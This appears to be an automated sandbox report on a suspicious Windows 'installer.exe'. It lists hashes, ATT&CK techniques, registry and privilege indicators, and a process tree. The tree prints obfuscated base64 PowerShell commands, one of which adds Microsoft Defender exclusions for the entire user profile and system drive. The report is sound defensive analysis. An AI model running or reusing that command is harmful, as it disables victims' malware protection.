47967c1fb402a8536ccde5893855b5cf9283c352165fcfd31ef943e0babafa92

Analysis

max time kernel
428s
max time network
434s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
25/09/2024, 09:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

installer.exe
Size

7.0MB
MD5

be8f30f145ddb50fa3c05441af904cc5
SHA1

618ea25eff7dee7c24e1756e327180818c11b7a1
SHA256

47967c1fb402a8536ccde5893855b5cf9283c352165fcfd31ef943e0babafa92
SHA512

ec257216349f4d3a0581f5f8c46b09b0821b3ab9ac17310baa17a30d8eb82301828bf257f6652a271d577e0c1fb0bfea07aeab36be603cfa5e8326db946368cb
SSDEEP

196608:yNLPaPVczkhJixJ3ra9ai+QK3lo9rtiO6SzyVumyN:YyxhJkNra9l+QgyOAyVC

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

Checks computer location settings 2 TTPs 58 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	installer.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
428	10008	WerFault.exe	349
7424	8420	WerFault.exe	367

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
448	powershell.exe
2352	powershell.exe
896	powershell.exe
1564	powershell.exe
448	powershell.exe
4984	powershell.exe
4716	powershell.exe
1564	powershell.exe
2352	powershell.exe
896	powershell.exe
5048	powershell.exe
1776	powershell.exe
1736	powershell.exe
1736	powershell.exe
4716	powershell.exe
4716	powershell.exe
4984	powershell.exe
4984	powershell.exe
4740	powershell.exe
4740	powershell.exe
400	powershell.exe
400	powershell.exe
404	powershell.exe
404	powershell.exe
5048	powershell.exe
5048	powershell.exe
1736	powershell.exe
1776	powershell.exe
1776	powershell.exe
2120	powershell.exe
2120	powershell.exe
2444	powershell.exe
2444	powershell.exe
740	powershell.exe
740	powershell.exe
4740	powershell.exe
4740	powershell.exe
4144	powershell.exe
4144	powershell.exe
404	powershell.exe
404	powershell.exe
400	powershell.exe
400	powershell.exe
3012	powershell.exe
3012	powershell.exe
2120	powershell.exe
2120	powershell.exe
2552	powershell.exe
2552	powershell.exe
2444	powershell.exe
2444	powershell.exe
4772	powershell.exe
4772	powershell.exe
4132	powershell.exe
4132	powershell.exe
740	powershell.exe
4144	powershell.exe
4144	powershell.exe
3000	powershell.exe
3000	powershell.exe
612	powershell.exe
612	powershell.exe
3012	powershell.exe
3012	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2352	powershell.exe
Token: SeDebugPrivilege	448	powershell.exe
Token: SeDebugPrivilege	896	powershell.exe
Token: SeDebugPrivilege	1564	powershell.exe
Token: SeDebugPrivilege	4716	powershell.exe
Token: SeDebugPrivilege	4984	powershell.exe
Token: SeDebugPrivilege	5048	powershell.exe
Token: SeDebugPrivilege	1776	powershell.exe
Token: SeDebugPrivilege	1736	powershell.exe
Token: SeDebugPrivilege	4740	powershell.exe
Token: SeDebugPrivilege	400	powershell.exe
Token: SeDebugPrivilege	404	powershell.exe
Token: SeDebugPrivilege	2120	powershell.exe
Token: SeDebugPrivilege	2444	powershell.exe
Token: SeDebugPrivilege	740	powershell.exe
Token: SeDebugPrivilege	4144	powershell.exe
Token: SeDebugPrivilege	3012	powershell.exe
Token: SeDebugPrivilege	2552	powershell.exe
Token: SeDebugPrivilege	4772	powershell.exe
Token: SeDebugPrivilege	4132	powershell.exe
Token: SeDebugPrivilege	3000	powershell.exe
Token: SeDebugPrivilege	612	powershell.exe
Token: SeDebugPrivilege	5408	powershell.exe
Token: SeDebugPrivilege	5456	powershell.exe
Token: SeDebugPrivilege	5836	powershell.exe
Token: SeDebugPrivilege	5964	powershell.exe
Token: SeDebugPrivilege	5288	powershell.exe
Token: SeDebugPrivilege	5376	powershell.exe
Token: SeDebugPrivilege	5816	powershell.exe
Token: SeDebugPrivilege	5584	powershell.exe
Token: SeDebugPrivilege	2464	powershell.exe
Token: SeDebugPrivilege	5532	powershell.exe
Token: SeDebugPrivilege	5300	powershell.exe
Token: SeDebugPrivilege	5200	powershell.exe
Token: SeDebugPrivilege	6364	powershell.exe
Token: SeDebugPrivilege	6448	powershell.exe
Token: SeDebugPrivilege	6920	powershell.exe
Token: SeDebugPrivilege	6980	powershell.exe
Token: SeDebugPrivilege	6248	powershell.exe
Token: SeDebugPrivilege	6160	powershell.exe
Token: SeDebugPrivilege	6776	powershell.exe
Token: SeDebugPrivilege	6668	powershell.exe
Token: SeDebugPrivilege	1868	powershell.exe
Token: SeDebugPrivilege	7136	powershell.exe
Token: SeDebugPrivilege	5380	powershell.exe
Token: SeDebugPrivilege	3232	powershell.exe
Token: SeDebugPrivilege	7628	powershell.exe
Token: SeDebugPrivilege	7584	powershell.exe
Token: SeDebugPrivilege	8024	powershell.exe
Token: SeDebugPrivilege	8052	powershell.exe
Token: SeDebugPrivilege	7408	powershell.exe
Token: SeDebugPrivilege	7592	powershell.exe
Token: SeDebugPrivilege	7736	powershell.exe
Token: SeDebugPrivilege	8136	powershell.exe
Token: SeDebugPrivilege	8132	powershell.exe
Token: SeDebugPrivilege	7516	powershell.exe
Token: SeDebugPrivilege	224	powershell.exe
Token: SeDebugPrivilege	7976	powershell.exe
Token: SeDebugPrivilege	8120	powershell.exe
Token: SeDebugPrivilege	4836	powershell.exe
Token: SeDebugPrivilege	3112	powershell.exe
Token: SeDebugPrivilege	516	powershell.exe
Token: SeDebugPrivilege	804	powershell.exe
Token: SeDebugPrivilege	1456	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4172 wrote to memory of 448	4172	installer.exe	82
PID 4172 wrote to memory of 448	4172	installer.exe	82
PID 4172 wrote to memory of 448	4172	installer.exe	82
PID 4172 wrote to memory of 2352	4172	installer.exe	84
PID 4172 wrote to memory of 2352	4172	installer.exe	84
PID 4172 wrote to memory of 2352	4172	installer.exe	84
PID 4172 wrote to memory of 432	4172	installer.exe	86
PID 4172 wrote to memory of 432	4172	installer.exe	86
PID 4172 wrote to memory of 432	4172	installer.exe	86
PID 432 wrote to memory of 896	432	installer.exe	87
PID 432 wrote to memory of 896	432	installer.exe	87
PID 432 wrote to memory of 896	432	installer.exe	87
PID 432 wrote to memory of 1564	432	installer.exe	88
PID 432 wrote to memory of 1564	432	installer.exe	88
PID 432 wrote to memory of 1564	432	installer.exe	88
PID 432 wrote to memory of 4592	432	installer.exe	91
PID 432 wrote to memory of 4592	432	installer.exe	91
PID 432 wrote to memory of 4592	432	installer.exe	91
PID 4592 wrote to memory of 4984	4592	installer.exe	92
PID 4592 wrote to memory of 4984	4592	installer.exe	92
PID 4592 wrote to memory of 4984	4592	installer.exe	92
PID 4592 wrote to memory of 4716	4592	installer.exe	94
PID 4592 wrote to memory of 4716	4592	installer.exe	94
PID 4592 wrote to memory of 4716	4592	installer.exe	94
PID 4592 wrote to memory of 2056	4592	installer.exe	95
PID 4592 wrote to memory of 2056	4592	installer.exe	95
PID 4592 wrote to memory of 2056	4592	installer.exe	95
PID 2056 wrote to memory of 5048	2056	installer.exe	97
PID 2056 wrote to memory of 5048	2056	installer.exe	97
PID 2056 wrote to memory of 5048	2056	installer.exe	97
PID 2056 wrote to memory of 1776	2056	installer.exe	99
PID 2056 wrote to memory of 1776	2056	installer.exe	99
PID 2056 wrote to memory of 1776	2056	installer.exe	99
PID 2056 wrote to memory of 2384	2056	installer.exe	100
PID 2056 wrote to memory of 2384	2056	installer.exe	100
PID 2056 wrote to memory of 2384	2056	installer.exe	100
PID 2384 wrote to memory of 1736	2384	installer.exe	102
PID 2384 wrote to memory of 1736	2384	installer.exe	102
PID 2384 wrote to memory of 1736	2384	installer.exe	102
PID 2384 wrote to memory of 4740	2384	installer.exe	104
PID 2384 wrote to memory of 4740	2384	installer.exe	104
PID 2384 wrote to memory of 4740	2384	installer.exe	104
PID 2384 wrote to memory of 60	2384	installer.exe	106
PID 2384 wrote to memory of 60	2384	installer.exe	106
PID 2384 wrote to memory of 60	2384	installer.exe	106
PID 60 wrote to memory of 404	60	installer.exe	107
PID 60 wrote to memory of 404	60	installer.exe	107
PID 60 wrote to memory of 404	60	installer.exe	107
PID 60 wrote to memory of 400	60	installer.exe	108
PID 60 wrote to memory of 400	60	installer.exe	108
PID 60 wrote to memory of 400	60	installer.exe	108
PID 60 wrote to memory of 2492	60	installer.exe	111
PID 60 wrote to memory of 2492	60	installer.exe	111
PID 60 wrote to memory of 2492	60	installer.exe	111
PID 2492 wrote to memory of 2120	2492	installer.exe	112
PID 2492 wrote to memory of 2120	2492	installer.exe	112
PID 2492 wrote to memory of 2120	2492	installer.exe	112
PID 2492 wrote to memory of 2444	2492	installer.exe	114
PID 2492 wrote to memory of 2444	2492	installer.exe	114
PID 2492 wrote to memory of 2444	2492	installer.exe	114
PID 2492 wrote to memory of 3624	2492	installer.exe	243
PID 2492 wrote to memory of 3624	2492	installer.exe	243
PID 2492 wrote to memory of 3624	2492	installer.exe	243
PID 3624 wrote to memory of 740	3624	installer.exe	117

C:\Users\Admin\AppData\Local\Temp\installer.exe
"C:\Users\Admin\AppData\Local\Temp\installer.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4172
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:448
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2352
- C:\Users\Admin\AppData\Local\Temp\installer.exe
  "C:\Users\Admin\AppData\Local\Temp\installer.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:432
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:896
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1564
- - C:\Users\Admin\AppData\Local\Temp\installer.exe
    "C:\Users\Admin\AppData\Local\Temp\installer.exe"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4592
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4984
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
